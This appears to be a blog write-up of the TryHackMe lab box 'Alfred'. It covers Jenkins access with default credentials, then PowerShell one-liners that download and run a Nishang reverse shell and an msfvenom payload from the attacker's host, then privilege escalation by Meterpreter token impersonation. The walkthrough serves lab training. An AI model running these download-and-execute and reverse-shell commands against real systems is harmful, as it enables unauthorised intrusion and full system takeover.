Greetings everyone!
In today’s post, we’re going to try something a little different! I’ve recently signed up for a new hacking training platform called TryHackMe. I’ve read a few posts regarding TryHackMe, and the reviews have been nothing but outstanding, so I figured let’s give it a shot! In today’s post, I’ll be attacking the box called Alfred. So let’s get to it!
Alfred has an IP of 10.10.33.30. Knowing that, let’s start off with an Nmap scan!
Only 3 open ports are returned so we don’t have a lot to work with. Let’s start by browsing to port 80:
RIP Bruce Wayne?? Well that’s not a message I wanted to see. Did Bane (the best super-villain) finally end Batman, once and for all?
Anyways, back to the mission at hand! After some poking around on this port, I tried accessing what was on port 8080:
Ah, this looks more promising! Anytime I come across a login screen, I like to start off with some default credentials/password guessing. Let’s start with the good old admin:admin combo!
We’re in, just like that!
I’ve had no experience with Jenkins before, so I had to do some research on its weak/vulnerable points. Lucky for us, at the beginning of Alfred on the TryHackMe website, the author points us in the direction of using Nishang to gain initial access, by using one of it’s reverse shells. The only thing is where do we fire it off?
After some more research and poking around, the “Build” tab in the Configure section for “project” shows something interesting:
Looks like we can execute some Windows commands here! Probably where we want to load our shell. We’re going to be using a Powershell script from the Nishang repo:
powershell iex (New-Object Net.WebClient).DownloadString(‘http://10.11.10.249:80/Invoke-PowerShellTcp.ps1’);Invoke-PowerShellTcp -Reverse -IPAddress 10.11.10.249 -Port 9001, where 10.11.10.249 is our IP address.
Now before we paste this into the “Build” section of the website, we’re going to do two things: 1) spin up our own web-server to host this on, and 2) open up a listener with ncat:
Alright, let’s fire off the shell! Once we copy the script into the “Build” section, we need to apply the changes and then select “Build Now” back at the project screen. Let’s see if we’re successful!
Great! We have a low-priv shell! Now let’s grab the user flag before we escalate our privileges.
One flag down, one to go!
Now the summary of this box mentions we can escalate privileges by “exploiting Windows authentication tokens”. What we’re going to do here is create a meterpreter shell via msfvenom, and hopefully use meterpreter to find a module allowing us to exploit Windows authentication tokens!
Let’s create the payload:
Now that we have our payload created and saved, we’ll need to download it to our target using Powershell, so let’s modify our previous shell with our newly created payload:
powershell “(New-Object System.Net.WebClient).Downloadfile(‘http://10.11.10.249:80/Nath.exe’,’Nath.exe’)”
We can copy and paste this on our target system:
Now to get our Meterpreter shell, we’ll need to use Metasploit to create a handler:
Let’s start the shell on the target system:
Sweet, now we have our meterpreter shell!
Now let’s see if we can impersonate some tokens! Let’s load the incognito module:
Now we can check to see what tokens are available:
The BUILTIN\Administrators token seems very promising, so let’s impersonate that one!
Alright, we’re so close! We need to do one more step: we need to migrate processes. Even though we are impersonation NT AUTHORITY\SYSTEM, we still may not have full permissions. We’ll need to use the token of a process, and not the impersonated token. So let’s migrate to services.exe:
Now let’s drop into another shell and grab the root flag!
WOW! What a fun box! Needless to say I’ll be spending more of my time on this amazing platform. In fact I may just start working on the next box right now….
Thanks for reading!